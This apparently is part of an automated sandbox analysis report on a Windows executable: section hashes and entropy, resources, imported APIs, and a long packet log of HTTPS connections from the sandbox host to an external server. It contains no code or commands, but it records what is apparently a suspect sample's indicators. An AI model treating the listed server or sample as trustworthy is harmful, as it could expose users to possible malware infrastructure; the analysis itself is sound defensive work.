IMAGE_DIRECTORY_ENTRY_BASERELOC	0x39000	0x690	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1e9e0	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1e8a0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x2f0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14f70	0x15000	4b84423034d407d626104943d0222e86	False	0.5712658110119048	data	6.443528719333314	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0xae7e	0xb000	1ab1f552607b93c19945287cf209ee6b	False	0.4583407315340909	data	4.926230545718696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x21000	0xddd8	0xc200	88b702c0407c739274557dbdfb796cc2	False	0.8717179445876289	data	7.684905458367943	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x2f000	0x11c4	0x1200	5c19a0003f32f4a256b61a9a7f819f28	False	0.4796006944444444	data	4.93200231022249	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x31000	0x79b8	0x7a00	9bb896fcc43af8da5def8ed7a26036c1	False	0.680359887295082	data	7.489902837239678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x39000	0x690	0x800	7d05cd06be0681ebfb55794116241c0d	False	0.4990234375	data	4.9511369909812375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x312f8	0x17e2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9566568531239777
RT_ICON	0x32adc	0x98f	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	English	United States	0.7159787494891704
RT_ICON	0x3346c	0x9e7	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	English	United States	0.7317554240631163
RT_ICON	0x33e54	0xbdd	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced	English	United States	0.7728021073427724
RT_ICON	0x34a34	0xcac	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	English	United States	0.7919235511713933
RT_ICON	0x356e0	0xdcb	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	0.8088360237892949
RT_ICON	0x364ac	0x1b13	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8928004616938393
RT_RCDATA	0x37fc0	0x7a	data	English	United States	0.6639344262295082
RT_RCDATA	0x3803c	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x38050	0x14	data	English	United States	1.05
RT_GROUP_ICON	0x38064	0x68	data	English	United States	0.7692307692307693
RT_VERSION	0x380cc	0x36c	data	English	United States	0.4611872146118721
RT_MANIFEST	0x38438	0x580	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1348), with CRLF line terminators	English	United States	0.4403409090909091

Imports

DLL	Import
KERNEL32.dll	GetExitCodeProcess, CreateProcessW, GetModuleFileNameW, LoadResource, LockResource, WaitForSingleObject, FindResourceW, LoadLibraryW, WriteConsoleW, CreateFileW, GetLastError, CloseHandle, SizeofResource, GetFileAttributesW, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, SetFilePointerEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, VirtualAlloc
USER32.dll	wsprintfW, MessageBoxW
ADVAPI32.dll	RegOpenKeyExW, RegCloseKey, RegQueryValueExW
SHELL32.dll	ShellExecuteExW
SHLWAPI.dll	PathCombineW, PathRemoveFileSpecW, PathCanonicalizeW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 02:06:32.043299913 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:32.043374062 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:32.043473005 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:32.103868008 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:32.103910923 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.337605000 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.337740898 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.338424921 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.339587927 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.395838022 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.395853996 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.396156073 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.397583961 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.399199009 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.443320990 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.721929073 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.722013950 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.722217083 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.765609980 CET	49985	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.765645027 CET	443	49985	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.856515884 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.856555939 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:33.856637955 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.856863022 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:33.856878042 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.090269089 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.090356112 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.140327930 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.140367985 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.140753031 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.140763998 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.461107969 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.461133003 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.461226940 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.461226940 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.461302996 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.461359024 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.461488008 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.461541891 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.463108063 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.463170052 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.466926098 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.466993093 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.550929070 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.551023960 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.551107883 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.551187992 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.551230907 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.551243067 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.551243067 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.551270962 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.551292896 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.551335096 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.551734924 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.551817894 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.551986933 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.552061081 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.552829027 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.552908897 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.554889917 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.554953098 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.554982901 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.555001974 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.555054903 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.556874037 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.556972980 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.640805006 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.640906096 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.640960932 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.641026020 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.641083002 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.641119003 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.641140938 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.641165018 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.641192913 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.641211033 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.641259909 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.641309977 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.641745090 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.641808033 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.641928911 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.641978979 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.642004967 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.642055988 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.642440081 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.642493963 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.642517090 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.642569065 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.642954111 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.643007040 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.643083096 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.643131018 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.643413067 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.643467903 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.644675016 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.644747019 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.646581888 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.646651983 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.646667004 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.646678925 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.646703959 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.646720886 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.730340958 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.730384111 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.730426073 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.730479002 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.730488062 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.730622053 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.730673075 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.730737925 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.730742931 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.730751038 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.730803013 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.735660076 CET	49986	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.735663891 CET	443	49986	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.775593996 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.775613070 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:35.775732040 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.776197910 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:35.776209116 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:36.982727051 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:36.982860088 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:36.983344078 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:36.983360052 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:36.983627081 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:36.983633995 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.297837019 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.297867060 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.297976971 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.298000097 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.298046112 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.298413038 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.298465014 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.299859047 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.299942017 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.303411961 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.303477049 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.386274099 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.386318922 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.386358976 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.386375904 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.386399031 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.386425018 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.386672020 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.386717081 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.387533903 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.387578011 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.388433933 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.388479948 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.388814926 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.388861895 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.390237093 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.390270948 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.390289068 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.390296936 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.390311003 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.390333891 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.392065048 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.392117977 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.474766970 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.474832058 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.475090981 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.475138903 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.475172997 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.475215912 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.475399017 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.475440025 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.475502968 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.475541115 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.475878000 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.475915909 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.475934029 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.475969076 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.476013899 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.476052046 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.476784945 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.476826906 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.476830006 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.476838112 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.476859093 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.476875067 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.477174044 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.477212906 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.478137970 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.478178978 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.478271008 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.478310108 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.478955984 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.478997946 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.480474949 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.480530024 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.480551004 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.480592966 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.563860893 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.563919067 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.563966990 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.563991070 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.564009905 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.564018011 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.564033985 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.564058065 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.683300972 CET	49987	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.683334112 CET	443	49987	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.888196945 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.888241053 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:37.888297081 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.888709068 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:37.888720036 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.142852068 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.143371105 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.143821955 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.143829107 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.144021034 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.144026041 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.478141069 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.478166103 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.478282928 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.478298903 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.478508949 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.478576899 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.478584051 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.478621960 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.480267048 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.480329990 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.480336905 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.480364084 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.480405092 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.480551958 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.480564117 CET	443	49988	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.480573893 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.480611086 CET	49988	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.501931906 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.501965046 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:39.502048969 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.502276897 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:39.502289057 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:40.695086002 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:40.695166111 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:40.776968956 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:40.777010918 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:40.777220011 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:40.777249098 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.102974892 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.103008032 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.103038073 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.103076935 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.103118896 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.103118896 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.103221893 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.103279114 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.104953051 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.105010986 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.108449936 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.108565092 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.109008074 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.207529068 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.207595110 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.207741976 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.207798004 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.208929062 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.208990097 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.209203959 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.209249973 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.210031986 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.210089922 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.214407921 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.214464903 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.214617014 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.214673042 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.215101004 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.215158939 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.215817928 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.215878010 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.294359922 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.294440031 CET	49989	443	192.168.2.6	47.101.28.195
